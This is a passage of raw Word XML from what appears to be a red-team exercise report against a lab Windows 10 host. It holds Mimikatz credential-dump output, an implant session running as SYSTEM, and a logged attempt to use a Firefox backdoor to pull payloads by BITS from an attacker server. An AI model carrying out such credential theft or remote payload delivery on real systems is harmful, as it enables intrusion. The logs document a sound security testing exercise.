    <w:p w14:paraId="74D7620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User Name         : DWM-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D885E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Domain            : Window Manager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E96B7C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ogon Server      : (null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57152F9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ogon Time        : 5/8/2019 2:08:55 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CFE66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ID               : S-1-5-90-0-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC71E3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msv :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDEF62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tspkg :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D97002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wdigest :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EDAFE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name : TA52-WINDOWS-1$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D824C0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 WORKGROUP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AAB358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assword : (null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05307FF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kerberos :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A9E20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ssp :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004FE77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credman :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1470061E" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28A77BB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uthentication Id : 0 ; 996 (00000000:000003e4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4253B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lastRenderedPageBreak/>
        <w:t>Session           : Service from 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5792418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User Name         : TA52-WINDOWS-1$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E9FFF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Domain            : WORKGROUP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0E5C1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ogon Server      : (null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF077C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ogon Time        : 5/8/2019 2:08:55 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D303D2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ID               : S-1-5-20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA6C08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msv :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E35FB3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tspkg :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F2B7D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wdigest :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45842EB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name : TA52-WINDOWS-1$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B00FA5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 WORKGROUP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F91EAD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assword : (null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEA721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kerberos :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C28140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name : ta52-windows-1$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28944BE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 WORKGROUP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C31636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assword : (null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBED82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ssp :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D78494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credman :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA030A4" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E76C31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uthentication Id : 0 ; 26907 (00000000:0000691b)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2830E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ession           : Interactive from 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09EA354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User Name         : UMFD-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790A2FA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Domain            : Font Driver Host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D3954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ogon Server      : (null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E129CD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ogon Time        : 5/8/2019 2:08:55 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1781A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ID               : S-1-5-96-0-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD4C6B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msv :                                                                                                                                                                                                                                                                                                                      [22/1940]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D75FE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tspkg :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1186CE1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wdigest :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9D834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name : TA52-WINDOWS-1$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C3023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 WORKGROUP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2839629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assword : (null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C87BD1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kerberos :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6E798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ssp :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F38AC7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credman :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3C760B" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26895BA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uthentication Id : 0 ; 26866 (00000000:000068f2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8E502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ession           : Interactive from 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A6391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User Name         : UMFD-0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E82AE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Domain            : Font Driver Host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C29EB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ogon Server      : (null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554F67D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ogon Time        : 5/8/2019 2:08:55 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624F4DA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ID               : S-1-5-96-0-0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1763533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msv :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587B4FD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tspkg :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB40C6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wdigest :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4BD46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name : TA52-WINDOWS-1$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B216F1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 WORKGROUP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CAF3A6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assword : (null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2960E0C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kerberos :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049C1E3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ssp :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743F06D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credman :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F6DD38" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0991894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uthentication Id : 0 ; 25501 (00000000:0000639d)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4C642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ession           : UndefinedLogonType from 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A9F8B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User Name         : (null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B75D3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Domain            : (null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7F236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ogon Server      : (null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547DF0E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ogon Time        : 5/8/2019 2:08:55 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8F702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SID               : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCEAF1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msv :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1720935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tspkg :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C09BE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wdigest :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132B164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kerberos :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7702CF0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ssp :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CD179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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        credman :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740E9973" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F21C75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Authentication Id : 0 ; 999 (00000000:000003e7)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE82FA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ession           : UndefinedLogonType from 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7A54D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User Name         : TA52-WINDOWS-1$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2316B21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Domain            : WORKGROUP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BA4C2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ogon Server      : (null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E09734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Logon Time        : 5/8/2019 2:08:55 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B983A3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SID               : S-1-5-18</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FE3E8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msv :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B08B4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tspkg :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04DB969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wdigest :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772C94B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name : TA52-WINDOWS-1$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045302D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 WORKGROUP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA1707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assword : (null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F65389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kerberos :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1938AFE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name : ta52-windows-1$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC2046B"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 WORKGROUP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6430573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assword : (null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8F74E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ssp :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7383E50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credman :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F54E93" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4ED436F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FINISHED MIMIKATZ SEKURLSA PASSWORDS MODULE *****</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4C97B7" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B650AFE" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E637F0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msv :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0BFCD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tspkg :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EF95C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wdigest :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A51CCA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name : TA52-WINDOWS-1$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2623C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 WORKGROUP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65383B3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assword : (null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3944EC0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kerberos :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2420693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Username : ta52-windows-1$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A72440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Domain   : WORKGROUP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA92FA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 Password : (null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619571A8"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ssp :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D36140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credman :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EAAE36C" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CE39DBE"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FINISHED MIMIKATZ SEKURLSA PASSWORDS MODULE *****</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2327775D" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C1AEF7F" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7062A44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5:24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1344A95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main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C20F99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MAIN&gt;list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2815172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xml:space="preserve">        W1         128.55.12.76:50736 --&gt;   128.55.12.233:443   [HTTP]  Wed May  8 15:14:09 2019        active 595s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C257367" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53C92084"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5:29</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F14995"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MAIN&gt;con W1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A0CCF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whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E418E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 SYSTEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649BB1BA" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43FE10AD"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5:53</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D28A1A"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W1&gt;quit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C08C557" w14:textId="798E40DA" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_k2qey6slayn9" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="39" w:name="_Toc12600012"/>
      <w:bookmarkEnd w:id="38"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>15:41 -- TA5.2 Windows 1 -- Firefox BITS Micro APT</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
    </w:p>
    <w:p w14:paraId="17874F6F" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Browsed Firefox to http://128.55.12.167:8001/config.html.  Entered URL for BITS Micro APT as http://128.55.12.167:8001/ctfmon2.exe.  Used the wrong filename.  Retried with ctfhost2.exe and ctfhost3.exe.  Exploited Firefox backdoor to initiate download of ctfhost2.exe and ctfhost3.host.  In both cases, our server indicated the file was successfully downloaded using the BITS protocol; however, neither ran on target and we were unable to find them in the expected directories.  This test failed to complete as expected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137ECDAA" w14:textId="49C8AA25" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="_3c61y2vihv4u" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="41" w:name="_Toc12600013"/>
      <w:bookmarkEnd w:id="40"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Targets</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p w14:paraId="02A4A57D" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>ta52-windows-1</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>128.55.12.76</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Windows 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016D5EC4" w14:textId="075454D4" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="_g7l154tl4osi" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="43" w:name="_Toc12600014"/>
      <w:bookmarkEnd w:id="42"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Capabilities</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p w14:paraId="5BD93B14" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Firefox 54.0.1 backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BC4FBE" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>BITS protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4BFED2" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Failed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547B8D1D" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Micro APT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E16EAC" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Never ran due to BITS failure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5F8DDB" w14:textId="4339D528" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="_ljctbm1ug35l" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="45" w:name="_Toc12600015"/>
      <w:bookmarkEnd w:id="44"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Event Log</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>
    </w:p>
    <w:p w14:paraId="15D1EE71"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5:41</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B51D6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Visit 128.55.12.167:8001/config.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C359C50"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28.55.12.167:8001/ctfmon2.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBA5CC2"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Error: invalid filename!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B858B6B" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D4254F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5:49</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C2AAC7"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Visit 128.55.12.167:8001/config.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1E515C"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28.55.12.167:8001/ctfhost2.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452411AF"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Error: ctfhost2.exe did not run and cannot be found in %TEMP%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C7498F" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F5DA466"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6:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2678D8C3"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Visit 128.55.12.167:8001/config.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05208669" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>128.55.12.167:8001/ctfhost3.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11EB74B1" w14:textId="302E0437" w:rsidR="00FC027E" w:rsidRPr="00ED047C" w:rsidRDefault="00FC027E" w:rsidP="00ED047C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
